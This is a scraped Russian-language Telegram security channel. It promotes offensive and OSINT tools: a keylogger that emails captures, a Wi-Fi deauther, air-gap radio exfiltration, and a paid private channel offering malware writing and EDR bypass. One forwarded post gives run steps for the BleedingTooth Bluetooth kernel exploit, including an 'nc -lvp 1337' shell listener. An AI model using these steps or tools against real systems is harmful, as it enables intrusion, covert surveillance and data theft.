TG Telegram Group Link
Channel: Security
Back to Bottom
Авиаспоттинг по-хакерски

Взгляни на небо! Возможно, над твоей головой каждые несколько минут будет пролетать самолет, а то и не один. Я живу не далеко от аэропорта, и воздушный трафик в моем районе особенно сильный. Сервисы вроде Flightradar24 удивительно точно показывают информацию о самолетах в воздухе, потому что получают данные по протоколу ADS-B. Это можно делать самостоятельно, и сегодня покажу как.


🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#SDR #HackRF #ADS-B
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥101
Wi-Fi-Flash-Drive - псевдо-USB-накопитель, который получает данные с ПК по Wi-Fi (на базе ESP32-S2)

Это USB-устройство на базе ESP32-S2, которое будет распознаваться как USB-накопитель, но все содержимое накопителя будет передаваться с сервера по Wi-Fi. Вы можете поделиться папкой на сервере, и она создаст псевдообраз FAT32 (это не настоящий образ, он не будет записываться на диск или в память, он может быть огромного размера, 500 ГБ и т. д., и он будет создаваться очень быстро). На данный момент серверная часть предназначена только для Windows (из-за сокетов в C++, но я не думаю, что это большая проблема — исправить это для работы с другими ОС).

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#wifi #fakewifi #ESP
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥112
Tdesktop - это полный исходный код с инструкцией по сборке официального настольного клиента мессенджера Telegram, основанного на Telegram API и безопасном протоколе MTProto.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#telegram #opensource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
This media is not supported in your browser
VIEW IN TELEGRAM
🐱 System Bus Radio — история о том, как исследователь AM-волны вещал через компьютер 🐱

Некоторые компьютеры намеренно отключены от остального мира. Это включает в себя удаление их доступа к Интернету, беспроводной связи, Bluetooth, USB, внешнему хранилищу файлов и аудио. Это называется «воздушный зазор».

❗️Но даже в такой ситуации ваши данные могут утечь ❗️

Эта программа запускает на компьютере процессы, вызывающие электромагнитное излучение. Излучения имеют широкий частотный диапазон. Притом мощности сигнала уже сейчас хватает, чтобы «перебороть» экранирование и вещать вовне, пусть пока на весьма незначительное расстояние (порядка двух метров).

Таким образом эта программа может передавать секретные данные с компьютера через АМ-радиоволны и кто-то может удаленно принимать сигнал с помощью SDR-приемника.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#SDR #AM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥152
🎙 Skewy - маскирует разговор при помощи технологии ультразвукового глушителя, благодаря которому на записи речь будет хорошего качества.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#voice
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1111
Dnstwist — это движок пермутации доменных имён для выявления сквоттинга аналогичных доменов, фишинговых атак, мошенничества и корпоративного шпионажа.

Программа найдёт выглядящие схожим образом домены, которые противники могут использовать для атаки на вас.

Полезна как дополнительный источник анализа целевых угроз.



🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
This media is not supported in your browser
VIEW IN TELEGRAM
img-stego - эта программа является простым примером слепой стеганографии изображений с использованием подстановки младших разрядов (LSB). Она позволяет пользователю скрывать любые данные в 24-битных растровых изображениях в графическом интерфейсе.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#стеганография #img
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
ImgOps -сервис для проверки метаданных и различных инструментов реверсного поиска изображений.

🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#osint #metadata
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
🗣Возьму на курс несколько человек.
Писать в бот @itinfobez_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Octosuite — это мощный и гибкий инструмент для сбора и анализа информации (OSINT) на платформе GitHub.

Он позволяет автоматизировать поиск данных, выявлять уязвимости, отслеживать активность пользователей и репозиториев, а также собирать полезную информацию для анализа безопасности и разведки.

Основные возможности:
Поиск пользователей, организаций и репозиториев по различным критериям.


🎃 Вступить в закрытый канал / скрипто 🎃

👉 Подписаться 👈

#OSINT #Framework
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
Esp8266_deauther — это популярный и широко известный проект с открытым исходным кодом, использующий модуль ESP8266 Wi-Fi для выполнения атак деаутентификации (deauthentication attacks) на Wi-Fi сетях.

С её помощью устройство может сканировать сети и точки доступа, производить атаки на сети и отключать от них клиентов.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#WiFi #Attack #Deauth #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
🔒 ЗАКРЫТЫЙ КАНАЛ Security [private] 🔒

🔄 ЧТО ВАС ЖДЁТ ВНУТРИ ? 🔄
CTF-разборы с нуля: От простых тасков до OSCP-уровня
Создание Bредоносного программного обеспечения / Malware: Реверс-инжиниринг, антидетект, эксплуатация уязвимостей (только для исследований!)
CVE Deep Dive: Анализ свежих 0-day уязвимостей + PoC-код
Эксклюзивные гайды: Методы обхода EDR, криптография в Red Team операциях
Разбор CTF-задач: Погружение в реальные кейсы из соревнований по информационной безопасности.
Детальный анализ вредоносных программ: Исследуем сложные и самописные вирусы, трояны, ransomware. Узнайте, как они обходят защиту и как их обезвреживать.
Создание вредоносного ПО (ВПО) для тестирования: Образовательные примеры написания malware с нуля (в образовательных целях).
Эксклюзивные материалы: Обзоры новых угроз, техники APT-групп, методы reverse engineering.

Что вы получаете приобретая подписку ?
🔥 Самописные вредоносные программы. Научитесь распознавать и бороться с уникальными угрозами, которые не ловит антивирус.
🔥 Практико-ориентированный подход: Не теория, а реальные сценарии для прокачки ваших навыков.
🔥 Закрытое сообщество: Публикация контента только по теме канала. Без спама, только профессиональный контент.

⚠️ ВНИМАНИЕ🤕:
Весь контент — для образовательных целей. Автор не несет ответственности за незаконное использование.

🎃 Вступить в закрытый канал 🎃

💻 Поддержка 💻
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💔4
🔗 SQL Squid Game 🔗

Бесплатная обучающая игра по SQL вдохновленная сериалом «Игра в кальмара». Всего 9 тематических уровней, в каждом из которых спрятана задача. Ошиблись — придется начинать заново. С каждым уровнем задания становятся всё сложнее, но везде даётся по 2 подсказки.

Если навыков не хватает или хотите выучить SQL с нуля, то есть 33 бесплатных урока, чтобы подтянуть знания.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#sql #game
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12💔3
Wave - терминал с открытым исходным кодом, который сочетает в себе традиционные возможности терминала с графическими возможностями, такими как предварительный просмотр файлов, веб-браузинг и помощь ИИ. Он работает на MacOS, Linux и Windows.

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#terminal
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥81
🐱 Keylogger — простой кейлоггер на Python 🐱

Отправляет на почту захваченные нажатия:
Клавиатура
Мышь
микрофон

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#Keylogger #Python #OpenSource
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥111
Forwarded from Security [private]
Это эксплойт для уязвимости нулевого дня в ядре Linux, позволяющий выполнить произвольный код в пространстве ядра с правами root. Эксплойт использует уязвимость в протоколе Bluetooth A2MP для перехвата управления системой.

BleedingTooth: Удалённое выполнение кода в Bluetooth-стеке Linux без взаимодействия пользователя (Zero-Click)

Компиляция:
 $ gcc -o exploit BleedingTooth.c -lbluetooth


Запуск:
 $ sudo ./exploit MAC-адрес атакуемого устройства


В другом терминале выполнить:
 $ nc -lvp 1337



При успешной эксплуатации для запуска калькулятора выполнится:
$ export XAUTHORITY=/run/user/1000/gdm/Xauthority
$ export DISPLAY=:0
$ gnome-calculator


Успешность: ~80% для целевой версии ядра.

Ограничения:
Bluetooth должен быть активен и доступен для подключения.
SELinux/AppArmor могут блокировать выполнение кода.
Современные ядра (после 5.15) не уязвимы.

Статья на хакере - Эксперты Google и Intel предупредили об опасных Bluetooth-багах в Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
CVE-2025-49144 — это уязвимость с высоким уровнем риска, связанная с повышением локальных привилегий, обнаруженная в установщиках Notepad++ версии 8.8.1 и более ранних версий. Эта уязвимость возникает из-за неконтролируемого поведения пути поиска исполняемых файлов во время установки, что позволяет локальному злоумышленнику получить привилегии системного уровня, поместив вредоносные исполняемые файлы в тот же каталог, что и установщик.

Купить книгу по пентесту для начинающих можно тут 📔

🎃 Вступить в закрытый канал 🎃

👉 Подписаться 👈

#CVE #Windows #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
HTML Embed Code:
2025/07/14 00:34:41
Back to Top